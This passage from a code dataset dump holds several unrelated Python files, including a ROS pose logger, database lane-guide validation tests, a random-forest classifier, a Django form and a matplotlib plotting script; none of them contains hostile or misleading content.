csv\n\n\npose = PoseStamped()\n\ndef joyCallback(msg):\n\tglobal pose,test_writer \n\tpose_pub = rospy.Publisher('bebop/captured_pose', PoseStamped, queue_size=10)\t\n\twith open('test.csv', mode='a') as test_file:\n\t\ttest_writer = csv.writer(test_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tif msg.buttons[2] == 1:\n\t\t\ttest_writer.writerow([pose.pose.position.x, pose.pose.position.y, pose.pose.position.z])\n\t\t\tpose_pub.publish(pose)\n\t\t\trospy.sleep(0.25)\n\ndef poseCallback(msg):\n\tglobal pose\n\tpose = msg\n\ndef 
main():\n\trospy.init_node('spacepoints', anonymous=False)\t\t\n\trospy.Subscriber('/vrpn_client_node/bebop/pose',PoseStamped,poseCallback)\n\trospy.Subscriber('/bebop/joy',Joy, joyCallback)\n\t\n\tglobal test_writer\n\trospy.spin()\n\t\n\nif __name__ == '__main__':\n\tmain()","sub_path":"flight_points.py","file_name":"flight_points.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"125255977","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author : AL\n\nimport logging\n\n\ndef allot_logger_just_show(name, level=None, fmt=None):\n    '''\n    Initialize a logger\n    :param name: name of the logger\n    :param fmt: log format\n    :param level: severity level of the log\n    :return:\n    '''\n    if level == None:\n        level = logging.DEBUG\n    if fmt == None:\n        fmt = '%(asctime)s : %(message)s'\n    datefmt = '%Y-%m-%d %H:%M:%S'\n    logger = logging.getLogger(name)\n    if not logger.handlers:\n        logger.setLevel(level)\n\n        con_handler = logging.StreamHandler()\n        con_handler.setLevel(logging.DEBUG)\n        con_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n        logger.handlers = [con_handler]\n\n\ndef allot_logger(name, filename, level=None, fmt=None):\n    '''\n    Initialize a logger\n    :param name: name of the logger\n    :param filename: path of the log file\n    :param fmt: log format\n    :param level: severity level of the log\n    :return:\n    '''\n    if level == None:\n        level = logging.DEBUG\n    if fmt == None:\n        fmt = '%(asctime)s - %(module)s.%(funcName)s - %(levelname)s [line:%(lineno)d]: %(message)s'\n    datefmt = '%Y-%m-%d %H:%M:%S'\n    logger = logging.getLogger(name)\n    if not logger.handlers:\n        logger.setLevel(level)\n\n        con_handler = logging.StreamHandler()\n        con_handler.setLevel(logging.DEBUG)\n        con_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n        file_handler = logging.FileHandler(filename)\n        file_handler.setLevel(logging.DEBUG)\n        file_handler.setFormatter(logging.Formatter(fmt, datefmt))\n\n        logger.handlers = [con_handler, file_handler]\n\n\nallot_logger('Pspider', '..\\Report\\Report.log', level=logging.ERROR)\nallot_logger_just_show(\"monitor\", level=logging.DEBUG)\n\n\ndef get_logger():\n    return logging.getLogger('Pspider')\n\n\ndef get_monitor_logger():\n    return logging.getLogger('monitor')\n\nreport_logger = get_logger()\nmontion_logger = get_monitor_logger()\n\nif __name__ == '__main__':\n    report_logger.info(\"test_info\")\n    report_logger.error(\"test_error\")\n    montion_logger.info(\"test_info\")\n    montion_logger.error(\"test_error\")\n    pass\n","sub_path":"component/logger_config.py","file_name":"logger_config.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"553540738","text":"# -*- coding: utf-8 -*-\n\n# Draw a block diagram of the attic heating fed from a wood-burning stove.\n\nfrom schema.canvas import Path\nfrom schema.canvas import Canvas\nfrom schema.canvas import Circle\nfrom schema.canvas import Line\nfrom schema.canvas import Square\nfrom schema.vector import Transform\nfrom schema.vector import I\n\nGS = 12.0 # base size of some assumed grid\n\n# equilateral_triangle\nEQ_TRIANGLE_H = 0.866 # height of the triangle\nEQ_TRIANGLE_R = 0.289 # The radius of the inscribed circle\nEQ_TRIANGLE = Transform().move((EQ_TRIANGLE_R - EQ_TRIANGLE_H, 0)).transform_points([\n    (0.0, 0.0),\n    (EQ_TRIANGLE_H, 0.5),\n    (EQ_TRIANGLE_H, -0.5),\n    (0.0, 0.0)\n])\n\n# Schematic symbol of a mixing valve\nMIX_VALVE = Transform().scale(0.5).transform_points([\n    (0.0, 0.0),\n    (EQ_TRIANGLE_H, 0.5),\n    (EQ_TRIANGLE_H, -0.5),\n    
(-EQ_TRIANGLE_H, 0.5),\n    (-EQ_TRIANGLE_H, -0.5),\n    (0.0, 0.0),\n    (0.5, -EQ_TRIANGLE_H),\n    (-0.5, -EQ_TRIANGLE_H),\n    (0.0, 0.0)\n])\n\n# Schematic symbol of a pump\ncircle = Circle()\ntriangle = Line(Transform().scale(0.70).transform_points(EQ_TRIANGLE))\n\n# Wood-burning stove\ndef write_heater(canvas, transf = I):\n    if canvas is not None:\n        t = I.scale(2.0, 3.0).transform(transf)\n        symbol = Square(t)\n        symbol.write(canvas)\n    return transf.r_move(-1.0, 0.0), transf.r_move(1.0, 0.0)\n\ndef write_pump(canvas, transf = I):\n    if canvas is not None:\n        symbol = Circle(transf)\n        symbol.write(canvas)\n        t = I.scale(-0.6, 0.6).transform(transf)\n        symbol = Line(EQ_TRIANGLE, t)\n        symbol.write(canvas)\n    return transf.r_move(-0.5, 0.0), transf.r_move(0.5, 0.0)\n\ndef write_mix_valve(canvas, transf = I):\n    if canvas is not None:\n        symbol = Line(MIX_VALVE, transf)\n        symbol.write(canvas)\n    return transf.r_move(-0.5, 0.0), transf.r_move(0.5, 0.0), transf.rotate_vect().r_move(0.5, 0.0)\n\ndef write_corner(canvas, transf = I):\n    if canvas is not None:\n        symbol = Line(((-0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), transf)\n        symbol.write(canvas)\n    return transf.r_move(-0.5, 0.0), transf.rotate_vect().r_move(0.5, 0.0)\n\ndef write_radiator(canvas, transf = I):\n    if canvas is not None:\n        symbol = Square(I.scale(2.0, 3.0).transform(transf))\n        symbol.write(canvas)\n    return transf.r_move(-1.0, 0.0), transf.r_move(1.0, 0.0)\n\ndef write_tee2(canvas, t1, t2):\n    p1x, p1y = t1.transform_point((0.0, 0.0))\n    v1x, v1y = t1.transform_vector((-1.0, 0.0))\n    p2x, p2y = t2.transform_point((0.0, 0.0))\n    v2x, v2y = t2.transform_vector((-1.0, 0.0))\n    ox = p1x * v2x + p2x * v1x\n    oy = p1y * v2y + p2y * v1y\n    t = t1.move_to((ox, oy))\n    symbol = Line(((-0.5, 0.0), (0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), t)\n    symbol.write(canvas)\n    return t.move(t.transform_vector((1.5, 0.0)))\n\ndef write_tee(canvas, t = I):\n    if canvas is not None:\n        symbol = Line(((-0.5, 0.0), (0.5, 0.0), (0.0, 0.0), (0.0, -0.5)), t)\n        symbol.write(canvas)\n    return t.r_move(-0.5, 0.0), t.r_move(0.5, 0.0), t.rotate_vect().r_move(0.5, 0.0)\n\ndef write_wire(canvas, t = I, scale = 1.0):\n    if canvas is not None:\n        Line([(0.0, 0.0), (1.0 * scale, 0.0)], t).write(canvas)\n    return t, t.r_move(1.0 * scale, 0.0)\n\ndef get_t(write_fn, t1, i = 0):\n    t2 = write_fn(None, t1)[i]\n    x1, y1 = t1.get_offset()\n    x2, y2 = t2.get_offset()\n    dx, dy = x1 - x2, y1 - y2\n    return t1.move((dx, dy))\n\n\n# Draw the diagram\ncanvas = Canvas()\ntransform = I\nt1, t2, t3 = write_mix_valve(canvas, I)\ncanvas.text('=KKB-MV', t2.r_move(0.0, 1.0).get_offset(), 'n')\n_, t2 = write_wire(canvas, t2)\n_, t2 = write_pump(canvas, get_t(write_pump, t2))\ncanvas.text('=KKB-P', t2.r_move(0.0, 1.0).get_offset(), 'n')\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_radiator(canvas, get_t(write_radiator, t2))\ncanvas.text('=OT', t2.get_offset(), 'se')\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, -t3.get_offset()[1] + t2.get_offset()[0] - 1.0)\n_, t2, t3 = write_tee(canvas, get_t(write_tee, t2))\nwrite_wire(canvas, t3, 2.5)\n_, t2 = write_wire(canvas, t2, 1.0)\n_, t2, t3 = write_mix_valve(canvas, get_t(write_mix_valve, t2))\ncanvas.text('=KKA-MV', t2.r_move(0.0, 1.0).get_offset(), 's')\n_, t2 = write_wire(canvas, t2)\n_, t2 = write_pump(canvas, get_t(write_pump, t2))\ncanvas.text('=KKA-P', t2.r_move(0.0, 1.0).get_offset(), 's')\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = 
write_wire(canvas, t2, 0.25)\n_, t2 = write_heater(canvas, get_t(write_heater, t2))\ncanvas.text('=KK', t2.get_offset(), 'nw')\n_, t2 = write_wire(canvas, t2, 0.25)\n_, t2 = write_corner(canvas, get_t(write_corner, t2))\n_, t2 = write_wire(canvas, t2, 2.0)\n_, t2, t3 = write_tee(canvas, t2.move_to((t3.get_offset()[0], t2.get_offset()[1])))\nwrite_wire(canvas, t3, 2.5)\n_, t2 = write_wire(canvas, t2, 1.0)\n\n\n#transform, t2 = write_mix_valve(canvas, transform)\n#transform = write_pump(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_radiator(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_tee(canvas, transform, t2)\n#transform, t2 = write_mix_valve(canvas, transform)\n#transform = write_pump(canvas, transform)\n#transform = write_corner(canvas, transform)\n#transform = write_heater(canvas, transform)\n#transform = write_corner(canvas, transform)\n","sub_path":"book/script/blockdiagram.py","file_name":"blockdiagram.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494631182","text":"# -*- coding: UTF8 -*-\n\nimport platform.TestCase\nfrom check.rdb import rdb_common_check\nRIGHT_ARROW = [2, 4, 8, 2048, 4096]\nLEFT_ARROW = [16, 32, 64, 128, 8192]\n\n\nclass CCheckGuideInfoLaneInlinkidValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_in_link_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_in_link_id_fkey FOREIGN KEY (in_link_id)\n REFERENCES rdb_link (link_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n\n if self.pg.execute(sqlcmd) == -1:\n return False\n else :\n return True\n\n\nclass CCheckGuideInfoLaneNodeidValiadate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_node_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_node_id_fkey FOREIGN KEY (node_id)\n REFERENCES rdb_node (node_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n\n if self.pg.execute(sqlcmd) == -1:\n return False\n else :\n return True\n\n\nclass CCheckGuideInfoLaneOutlinkidValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = self.pg.GetDropFKeyStr('rdb_guideinfo_lane_out_link_id_fkey', 'rdb_guideinfo_lane')\n sqlcmd = sqlcmd + \\\n \"\"\"\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT rdb_guideinfo_lane_out_link_id_fkey FOREIGN KEY (out_link_id)\n REFERENCES rdb_link (link_id) MATCH FULL\n ON UPDATE NO ACTION ON DELETE NO ACTION;\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneTotalLaneNumValidate(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num CHECK (lane_num <= 16 AND lane_num >= 1);\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneLeftChangeLane(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num_l;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num_l CHECK (lane_num_l >= (-7) AND lane_num_l <= 7);\n \"\"\"\n if self.pg.execute(sqlcmd) == 
-1:\n return False\n else:\n return True\n\n\nclass CCheckGuideInfoLaneRightChangeLane(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n ALTER TABLE rdb_guideinfo_lane DROP CONSTRAINT if exists check_lane_num_r;\n ALTER TABLE rdb_guideinfo_lane\n ADD CONSTRAINT check_lane_num_r CHECK (lane_num_r >= (-7) AND lane_num_r <= 7);\n \"\"\"\n if self.pg.execute(sqlcmd) == -1:\n return False\n else:\n return True\n\n\nclass CCheckGuideLaneInlinkTileSame(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'in_link_id', 'in_link_id_t')\n return checkobject.do()\n\n\nclass CCheckGuideLaneNodeTileSame(platform.TestCase.CTestCase):\n\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'node_id', 'node_id_t')\n return checkobject.do()\n\n\nclass CCheckGuideLaneOutlinkTileSame(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckItemTileIDSame(self.pg, 'rdb_guideinfo_lane', 'out_link_id', 'out_link_id_t')\n return checkobject.do()\n \nclass CCheckGuideLanePasslinkCnt(rdb_common_check.CCheckPassLinkCountWithGuideidParam):\n def __init__(self, suite, caseinfo):\n rdb_common_check.CCheckPassLinkCountWithGuideidParam.__init__(self, suite, caseinfo, 'lane_tbl', 'passlink_cnt')\n pass\n\n\nclass CCheckGuideLaneInLinkOutLinkEqual(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select count(*) from rdb_guideinfo_lane where in_link_id = out_link_id\n \"\"\"\n return 0 == self.pg.getOnlyQueryResult(sqlcmd)\n\n\nclass CCheckGuideLaneExtendFlag(platform.TestCase.CTestCase):\n def _do(self):\n checkobject = rdb_common_check.\\\n CCheckNodeExtendFlag(self.pg, 'rdb_guideinfo_lane', 6)\n return checkobject.do()\n\n\nclass CCheckGuideLanePathCnt(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select *\n from\n (\n SELECT gid, id, nodeid, inlinkid, outlinkid, array_upper(regexp_split_to_array(passlid, E'\\\\|+'),1) as lenth, passlink_cnt,\n lanenum, laneinfo, arrowinfo, lanenuml, lanenumr, buslaneinfo\n FROM lane_tbl\n )as a\n where a.lenth <> passlink_cnt;\n \"\"\"\n self.pg.execute(sqlcmd)\n if len(self.pg.fetchall()) > 0:\n return False\n else:\n return True\n\n\nclass CCheckGuideLanePathLinkRe(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n SELECT regexp_split_to_array(passlid, E'\\\\|+') as passlinks\n FROM lane_tbl\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n for row in rows:\n len1 = len(row[0])\n lent2 = len(set(row[0]))\n if len1 != lent2:\n return False\n return True\n\nclass CCheckGuideLaneNodeForwarded(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n select f.node_id\n from (\n select c.node_id\n from(\n select unnest(nodes) as node_id\n from(\n SELECT inlinkid, array_agg(passlink_cnt) as a,array_agg( distinct nodeid) as nodes\n FROM lane_tbl\n group by inlinkid\n ) as b\n where 0 <> all(a)\n ) as c\n left join link_tbl as d\n on c.node_id = d.s_node or c.node_id = d.e_node\n ) as f\n group by f.node_id having count(*) < 3\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n if len(rows) > 0:\n return False\n else:\n return True\n\n\nclass CCheckGuideLaneArrowInfo(platform.TestCase.CTestCase):\n def _do(self):\n sqlcmd = \"\"\"\n SELECT lane_num, lane_info, arrow_info,in_link_id,out_link_id\n FROM rdb_guideinfo_lane;\n \"\"\"\n self.pg.execute(sqlcmd)\n rows = self.pg.fetchall()\n length = len(rows)\n normal_sum = 
0\n        exception_sum = 0\n        if length > 0:\n            for row in rows:\n                lane_num = row[0]\n                lane_info = row[1]\n                arrow_info = row[2]\n                left_lane = pow(2, lane_num - 1)\n                er_left_value = False\n                er_right_value = False\n                rt_left_value = False\n                rt_right_value = False\n                if left_lane <= lane_info:\n                    er_left_value = \\\n                        self._arrow_in_list(arrow_info, RIGHT_ARROW)\n                    rt_left_value = \\\n                        self._arrow_in_list(arrow_info, LEFT_ARROW)\n\n                if (lane_info % 2) != 0:\n                    er_right_value = \\\n                        self._arrow_in_list(arrow_info, LEFT_ARROW)\n                    rt_right_value = \\\n                        self._arrow_in_list(arrow_info, RIGHT_ARROW)\n\n                if rt_left_value or rt_right_value:\n                    normal_sum = normal_sum + 1\n                if er_left_value or er_right_value:\n                    exception_sum = exception_sum + 1\n#            print normal_sum, exception_sum\n            if normal_sum > exception_sum:\n                return True\n            else:\n                return False\n        else:\n            return False\n\n    def _arrow_in_list(self, arrow, arrow_list):\n        if len(arrow_list) < 1:\n            return False\n        for temp_arrow in arrow_list:\n            if (arrow & temp_arrow) != 0:\n                return True\n        return False\n\n\nclass CCheckGuideLaneAllStraight(platform.TestCase.CTestCase):\n    def _do(self):\n        sqlcmd = \"\"\"\n            select count(*)\n            from(\n                SELECT in_link_id, node_id, array_agg(arrow_info) as arrows\n                FROM rdb_guideinfo_lane\n                where lane_info > 1\n                group by in_link_id,node_id\n            ) as a\n            where array_upper(arrows,1) > 2 and not (1 <> any(arrows));\n        \"\"\"\n        self.pg.execute(sqlcmd)\n        rows = self.pg.fetchone()\n        if rows[0] > 0:\n            return False\n        else:\n            return True\n\n\nclass CCheckGuideStraightLaneSmallOther(platform.TestCase.CTestCase):\n    def _do(self):\n        self.pg.CreateFunction_ByName(\"get_tow_link_angle\")\n        self.pg.CreateFunction_ByName(\"check_guide_lane_straight_dir\")\n        sqlcmd = \"\"\"\n            select check_guide_lane_straight_dir();\n        \"\"\"\n        self.pg.execute(sqlcmd)\n        rows = self.pg.fetchone()\n        if rows[0] == 0:\n            return False\n        else:\n            return True\n","sub_path":"Suntec/Road_Format13IDDN/source/V13/iDDN/AutoCheck/src/check/rdb/rdb_guideinfo_lane.py","file_name":"rdb_guideinfo_lane.py","file_ext":"py","file_size_in_byte":9709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"270846541","text":"# 10-6\n\nnum_1 = input (\"Please enter the first number (int): \")\nnum_2 = input (\"Please enter the second number (int): \")\n\ntry:\n    num_1 = int(num_1)\n    num_2 = int(num_2)\nexcept ValueError:\n    print (\"At least one of your inputs is an invalid number.\")\nelse:\n    print(str(num_1) + \" + \" + str(num_2) + \" = \" + str(num_1 + num_2))\n\n\n# 10-10\nfilename = \"alice.txt\"\n\ntry:\n    with open(filename) as file_obj:\n        contents = file_obj.read()\nexcept FileNotFoundError:\n    print (\"File <\" + filename + \"> not found!\")\nelse:\n    print(str(contents.lower().count(\"alice\")))\n\n\n","sub_path":"chap10/file04.py","file_name":"file04.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"59101232","text":"import pandas as pd\nimport numpy as np\nfrom scipy import interp\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\n\nfile1 = '../../data/FINAL_FEATURE_VECTOR_improved.csv'\nfeatures_all = pd.read_csv(file1)\nprint(features_all.shape)\n\ndisch = features_all.drop('DELTA_PAIN_3WEEKS', axis=1)\ndisch = disch.drop('DELTA_PAIN_8WEEKS', axis=1)\ndisch = disch.drop('CHANGE_DISCHARGE', axis=1)\ndisch = 
disch.drop('CHANGE_FOLLOWUP_3', axis=1)\ndisch = disch.drop('CHANGE_FOLLOWUP_8', axis=1)\ndisch = disch.drop('DAY_OF_DISCHARGE1', axis=1)\ndisch = disch.drop('FOLLOW_UP_3WEEKS1', axis=1)\ndisch = disch.drop('FOLLOW_UP_8WEEKS1', axis=1)\ngender = {'Male': 0,'Female': 1}\nrace = {'White': 1,'Black': 2,'Hispanic': 3,'Asian': 4,'Other': 5}\nmarital = {'Married': 0,'Single': 1}\nsurgery = {'ORTHOPEDICS': 1,'BREAST': 2,'GENERAL': 3,'BREAST RECONSTRUCTION': 4,'THORACOTOMY': 5,'VASCULAR': 6}\ninsurance = {'Private': 1,'Medicare': 2,'Medicaid': 2,'Other': 2}\nopioid = {'NO': 0,'YES': 1}\noutput = {'DECREASE': 0,'INCREASE': 1}\n\ndisch.GENDER = [gender[item] for item in disch.GENDER]\ndisch.RACE = [race[item] for item in disch.RACE]\ndisch.MARITAL_STATUS = [marital[item] for item in disch.MARITAL_STATUS]\ndisch.SURGERY_TYPE = [surgery[item] for item in disch.SURGERY_TYPE]\ndisch.INSURANCE_TYPE = [insurance[item] for item in disch.INSURANCE_TYPE]\ndisch.OPIOID_TOLERANT = [opioid[item] for item in disch.OPIOID_TOLERANT]\ndisch.DELTA_PAIN_DISCHARGE = [output[item] for item in disch.DELTA_PAIN_DISCHARGE]\n\ndisch1 = disch.dropna(subset=['DELTA_PAIN_DISCHARGE', 'PREOP_PAIN'])\nprint(disch.shape)\nprint(disch1.shape)\nfpr_load = []\ntpr_load = []\nthresholds = []\nfor i in range(10):\n train, test = train_test_split(disch1, test_size=0.2)\n print(train.shape)\n print(test.shape)\n regr = RandomForestClassifier(n_estimators=30, min_samples_split=100, class_weight=\"balanced\")\n X = train.iloc[:,1:65]\n print(X.shape)\n y = train.iloc[:,65]\n print(y.shape)\n regr.fit(X, y)\n X1 = test.iloc[:,1:65]\n y1 = test.iloc[:,65]\n predict_y1 = regr.predict_proba(X1)[:,1]\n false_positive_rate, true_positive_rate, thresholds = roc_curve(y1, predict_y1)\n fpr_load.append(false_positive_rate)\n tpr_load.append(true_positive_rate)\n\nn_folds = len(fpr_load)\ntprs = []\naucs = []\nmean_fpr = np.linspace(0, 1, 100)\nplt.figure(figsize=(10,8))\nfor i in range(n_folds):\n tprs.append(interp(mean_fpr, fpr_load[i], tpr_load[i]))\n tprs[-1][0] = 0.0\n roc_auc = auc(fpr_load[i], tpr_load[i])\n aucs.append(roc_auc)\n plt.plot(fpr_load[i], tpr_load[i], lw=1, alpha=0.3,\n label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\nplt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Random prediction', alpha=.8)\n\nmean_tpr = np.mean(tprs, axis=0)\nmean_tpr[-1] = 1.0\nmean_auc = auc(mean_fpr, mean_tpr)\nstd_auc = np.std(aucs)\nplt.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\nstd_tpr = np.std(tprs, axis=0)\ntprs_upper = np.minimum(mean_tpr + std_tpr, 1)\ntprs_lower = np.maximum(mean_tpr - std_tpr, 0)\nplt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. 
dev.')\n\nplt.xlim([-0.05, 1.05])\nplt.ylim([-0.05, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\n\nplt.legend(loc=\"lower right\")\nplt.show()\n\nfeature_name_aslist = list(X.columns.values)\ndf_elasticnetCoff = pd.DataFrame({'Features':feature_name_aslist, 'Weights':regr.feature_importances_})\nwriter = pd.ExcelWriter('../../data/randomforest/rf-classifier-coeffs1_new.xlsx')\ndf_elasticnetCoff.to_excel(writer,'Sheet1')\nwriter.save()\n","sub_path":"src/models/Random Forest Classifier/random_forest_classifier_discharge_pain.py","file_name":"random_forest_classifier_discharge_pain.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"130789279","text":"def check_pep8(files):\n\n def run_pycodestyle(files, ignored_rules):\n failed = False\n pep8 = subprocess.Popen(((['pycodestyle'] + files) + ['--ignore={rules}'.format(rules=','.join(ignored_rules))]), stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n for pipe in (pep8.stdout, pep8.stderr):\n assert (pipe is not None)\n for ln in pipe:\n sys.stdout.write(ln)\n failed = True\n return failed\n failed = False\n ignored_rules = ['E221', 'E226', 'E251', 'E265', 'E266', 'E302', 'E305', 'E402', 'E501', 'E731']\n IGNORE_FILES_PEPE261 = ['api/zulip/__init__.py', 'tools/run-dev.py', 'zerver/lib/bugdown/__init__.py', 'zerver/models.py', 'zerver/tests/test_bugdown.py', 'zerver/tests/test_events.py', 'zerver/tests/test_messages.py', 'zerver/tests/test_narrow.py', 'zerver/tests/test_outgoing_webhook_system.py', 'zerver/tests/test_realm.py', 'zerver/tests/test_signup.py', 'zerver/tests/test_subs.py', 'zerver/tests/test_upload.py', 'zerver/tornado/socket.py', 'zerver/tornado/websocket_client.py', 'zerver/worker/queue_processors.py', 'zilencer/management/commands/populate_db.py', 'zproject/dev_settings.py', 'zproject/prod_settings_template.py', 'zproject/settings.py']\n filtered_files = [fn for fn in files if (fn not in IGNORE_FILES_PEPE261)]\n filtered_files_E261 = [fn for fn in files if (fn in IGNORE_FILES_PEPE261)]\n if (len(files) == 0):\n return False\n if (not (len(filtered_files) == 0)):\n failed = run_pycodestyle(filtered_files, ignored_rules)\n if (not (len(filtered_files_E261) == 0)):\n if (not failed):\n failed = run_pycodestyle(filtered_files_E261, (ignored_rules + ['E261']))\n return failed","sub_path":"Data Set/bug-fixing-5/ae7781dd760555060427b23d48e29b22027d68f3--bug.py","file_name":"ae7781dd760555060427b23d48e29b22027d68f3--bug.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132533127","text":"from django import forms\nfrom .models import SuperHeroModel\nfrom FieldsWidgetsCWApp.choices import STATUS_CHOICES, SUPERPOWER_CHOICES, ALIGNMENT_CHOICES\n\n\nclass SuperHeroForm(forms.ModelForm):\n class Meta:\n model = SuperHeroModel\n fields = \"__all__\"\n widgets = {\n \"are_you_rich_or_have_superpowers\": forms.Select(choices=STATUS_CHOICES),\n \"if_so_what_superpower\": forms.Select(choices=SUPERPOWER_CHOICES),\n \"what_is_your_alignment\": forms.Select(choices=ALIGNMENT_CHOICES),\n }\n","sub_path":"FieldsWidgetsCWApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226412998","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport 
os\nimport numpy as np\nimport random\nimport torch\nimport glob\nimport torch.nn as nn\nimport torchvision\nfrom scipy.io import loadmat\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport sys\n\n#argv should be folder name, e.g. 'cat_mean_frame/'\nif len(sys.argv)>1:\n folder_name=sys.argv[1]\n\npath = folder_name + 'npy/'\n\ncc_nx_array = np.zeros([800,14])\ncc_nnx_array = np.zeros([800,14])\npsnr_nx_array = np.zeros([800,14])\npsnr_nnx_array = np.zeros([800,14])\nfor i in range(14):\n cc_nx_array[:,i]=np.load(path+'cc_nx-{}.npy'.format(i+1))\n cc_nnx_array[:,i]=np.load(path+'cc_nnx-{}.npy'.format(i+1))\n psnr_nx_array[:,i]=np.load(path+'psnr_nx-{}.npy'.format(i+1))\n psnr_nnx_array[:,i]=np.load(path+'psnr_nnx-{}.npy'.format(i+1))\n\nfig1 = plt.figure()\nplt.title('Correlation coefficient')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\ncc_img1 = plt.imshow(cc_nx_array[0:100,:],cmap='magma',aspect='auto')\nplt.clim(0.5,cc_nx_array.max())\nplt.colorbar(cc_img1)\nplt.savefig(folder_name+'cc_nx.png')\nplt.close(fig1)\n\nloc_list = []\nfor i in range(14):\n loc = np.argmax(cc_nnx_array[0:100,i]) #find the number of iteration that gives the biggest cc_nnx value\n loc_list.append(loc)\n\nprint(loc_list)\n\nfig2 = plt.figure()\nplt.title('Correlation coefficient')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\nplt.plot(range(14),loc_list) #this plot the blue curve\ncc_img2 = plt.imshow(cc_nnx_array[0:100,:],cmap='magma',aspect='auto')\nplt.clim(0.5,cc_nnx_array.max())\nplt.colorbar(cc_img2)\nplt.savefig(folder_name+'cc_nnx.png')\nplt.close(fig2)\n\n\nfig3 = plt.figure()\nplt.title('PSNR')\nplt.xticks()\nplt.xlabel('time frame')\nplt.yticks()\nplt.ylabel('iterations')\npsnr_img1 = 